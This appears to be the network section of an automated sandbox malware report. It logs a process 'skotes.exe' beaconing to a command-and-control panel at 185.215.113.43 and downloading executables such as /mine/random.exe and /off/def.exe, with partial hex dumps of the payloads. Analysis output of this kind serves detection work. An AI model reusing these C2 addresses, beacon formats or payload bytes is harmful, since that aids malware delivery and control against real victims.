                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                              Dec 16, 2024 01:03:37.721184015 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:03:37 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              35192.168.2.450116185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:03:41.144731998 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                              Dec 16, 2024 01:03:42.203465939 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:03:41 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              36192.168.2.450120185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:03:44.795916080 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                              Dec 16, 2024 01:03:45.874900103 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:03:45 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              37192.168.2.450122185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:03:49.451445103 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                              Dec 16, 2024 01:03:50.528697014 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:03:50 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              38192.168.2.450124185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:03:53.620857954 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                              Dec 16, 2024 01:03:54.697022915 CET293INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:03:54 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 36 37 0d 0a 20 3c 63 3e 31 30 31 35 38 33 32 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 37 65 38 36 34 34 30 33 61 63 35 32 65 61 34 38 34 62 34 31 31 62 39 64 63 34 65 31 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 67 <c>1015832001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#<d>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              39192.168.2.45012631.41.244.11808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:03:56.402149916 CET142OUTGET /files/fate/random.exe HTTP/1.1
                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                              If-Modified-Since: Wed, 11 Dec 2024 08:22:24 GMT
                                                                                                                                                                                              If-None-Match: "67594bc0-b1a00"
                                                                                                                                                                                              Dec 16, 2024 01:03:57.519005060 CET191INHTTP/1.1 304 Not Modified
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:03:57 GMT
                                                                                                                                                                                              Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "67594bc0-b1a00"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              40192.168.2.450127185.215.113.1680
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:03:57.285392046 CET80OUTGET /mine/random.exe HTTP/1.1
                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Dec 16, 2024 01:03:58.443589926 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:03:57 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 3026432
                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 23:57:40 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675f6cf4-2e2e00"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf1@2[.@WkD`11 @.rsrcD@.idata @ptiuyvxt ++@izyqsoku1.@.taggant01".@
                                                                                                                                                                                              Dec 16, 2024 01:03:58.443636894 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:03:58.443675995 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:03:58.443712950 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:03:58.443749905 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:03:58.443928957 CET1236INData Raw: e2 c2 fe 22 a1 b6 fa 22 02 fd ef 30 de 22 b4 8b 81 dd 1d 82 fa 72 fe c5 fc 5b ed 09 7e 56 21 95 96 06 42 2d 12 c1 47 46 de a9 26 75 47 0e e6 e5 12 fe ac 86 10 42 ff 54 bd c2 62 3e fd 1a 8d 46 9e f4 10 20 10 1e ef 2d fb f3 6c 0a fe aa 6e 15 c0 26
                                                                                                                                                                                              Data Ascii: ""0"r[~V!B-GF&uGBTb>F -ln&[M^VN^"4scN&#dr#a,bBFrufzgM!.}ZFvND]n5Ab"^fZGB6b$f 1"##2SV
                                                                                                                                                                                              Dec 16, 2024 01:03:58.443965912 CET1236INData Raw: d6 9c 64 a4 34 d6 e9 bf 04 8e d1 ce 39 d5 a0 14 71 ca 38 80 22 ca c5 71 ac fc 43 5e 29 e9 4e 6a 98 df 6d 03 8c f3 a9 42 23 5d ca 58 b4 47 fb 0d 53 c8 de 06 01 92 3c 5f 91 c4 a7 fc e6 eb c5 1f 22 52 a5 c3 e4 95 59 04 00 48 28 18 86 5e e8 3a 25 d2
                                                                                                                                                                                              Data Ascii: d49q8"qC^)NjmB#]XGS<_"RYH(^:%hWvSx(5S>rz-F<(G)1O3a$D7#neZ3U]>`U3\W_I]R$=T"HSNIL2Ps!W
                                                                                                                                                                                              Dec 16, 2024 01:03:58.444027901 CET1236INData Raw: d7 36 68 9a 16 e4 d9 0b ec 6a 01 d8 9e 99 31 8a 36 03 a8 14 e2 e1 f2 47 80 98 e4 e5 ea 4b df 8b 4e 13 62 c2 43 cb 09 5a 9d f3 2d 50 b6 05 ec 57 28 31 a0 c8 bd 12 07 dd f8 c6 89 e0 92 d6 6c ad 84 a7 a2 6a f2 c3 4e d6 8e 65 44 43 d8 ea f2 3e b6 bd
                                                                                                                                                                                              Data Ascii: 6hj16GKNbCZ-PW(1ljNeDC>8&x+H@G^Ie9md/%Vuv^k@qG?xix4#"ZvR%"OufW*V1+'g$b^mHP^6iH<{
                                                                                                                                                                                              Dec 16, 2024 01:03:58.444443941 CET1236INData Raw: 1a 14 85 08 e8 26 7e fe 42 fe 6b 23 be e9 d0 74 49 26 24 c1 42 4b 1f 02 1c de 08 ca 51 b3 da 83 2c cb fe 3e e0 5d 2e 83 8f d4 9f 3d a1 5d b1 53 e1 72 6e a3 ae 7f 24 96 67 3f 8d ed 6a c5 95 2a da d9 5d b0 b6 4a 47 39 ac ef 8d 1f 16 73 b4 2e 1c f6
                                                                                                                                                                                              Data Ascii: &~Bk#tI&$BKQ,>].=]Srn$g?j*]JG9s._gL3.!m[H$~nteijO3AqPQ<ea0>b jQYJ~d%G![!R!"%r%Emp!l-(YBkE
                                                                                                                                                                                              Dec 16, 2024 01:03:58.444483995 CET1236INData Raw: 5e a6 51 a8 a3 ee e3 31 a6 12 9a 8f 23 d0 30 c8 b9 d5 47 5c 42 d3 ba 07 7f 9e dd d2 39 d4 a7 8a 13 c1 51 78 87 96 2c 8f 17 7d ea 51 7c 2a ba f6 e4 fd a8 3b 34 a5 d8 5d e7 95 f6 78 26 f3 a7 41 b6 9c a6 d3 d6 3b 68 b2 1f 70 56 ea 77 2c 0b 7f 9d ca
                                                                                                                                                                                              Data Ascii: ^Q1#0G\B9Qx,}Q|*;4]x&A;hpVw,a{fCzcV~_U~sz0WWwiI,5g3j)@r]S.D6Sn/B,e,Ce}r$f6%,ogVbMyOYuS8=.
                                                                                                                                                                                              Dec 16, 2024 01:03:58.564986944 CET1236INData Raw: ff 22 81 1c 86 26 92 2a d3 74 e5 58 ef 0a 4f fc d0 e4 b1 1b fe d4 f2 05 b2 2f f0 52 fe d8 c5 45 15 67 82 58 92 87 40 98 18 aa de 66 de 44 09 8f 16 1a df c6 1d 35 6c 16 a0 51 f7 c8 4b c6 a8 69 63 54 2f 59 b6 01 d2 98 38 de ef dd 28 a5 ec 83 d9 bb
                                                                                                                                                                                              Data Ascii: "&*tXO/REgX@fD5lQKicT/Y8(r9XR*iSb^$\enjX,Q;v-b8&ds`aVhc"4Q"q@@Lx.QM2tQi$%bF`6^[0I<pH)y


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              41192.168.2.450130185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:04:02.444298029 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 35 38 33 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                              Data Ascii: d1=1015832001&unit=246122658369
                                                                                                                                                                                              Dec 16, 2024 01:04:03.548058987 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:04:03 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              42192.168.2.450133185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:04:07.390079021 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                              Dec 16, 2024 01:04:08.470310926 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:04:08 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              43192.168.2.450137185.215.113.4380
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:04:11.349195004 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                              Dec 16, 2024 01:04:12.439956903 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:04:12 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              44192.168.2.450140185.215.113.4380
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:04:15.459898949 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                              Dec 16, 2024 01:04:16.551265955 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:04:16 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              45192.168.2.450142185.215.113.1680
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:04:17.931027889 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                              Dec 16, 2024 01:04:19.137842894 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:04:18 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 2779136
                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 23:56:01 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675f6c91-2a6800"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 eb 67 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ +g+`Ui` @ @.rsrc`2@.idata 8@nprvplua **:@btyxknlq *B*@.taggant@*"F*@
                                                                                                                                                                                              Dec 16, 2024 01:04:19.137867928 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:04:19.137887955 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:04:19.138199091 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:04:19.138231039 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:04:19.138283014 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
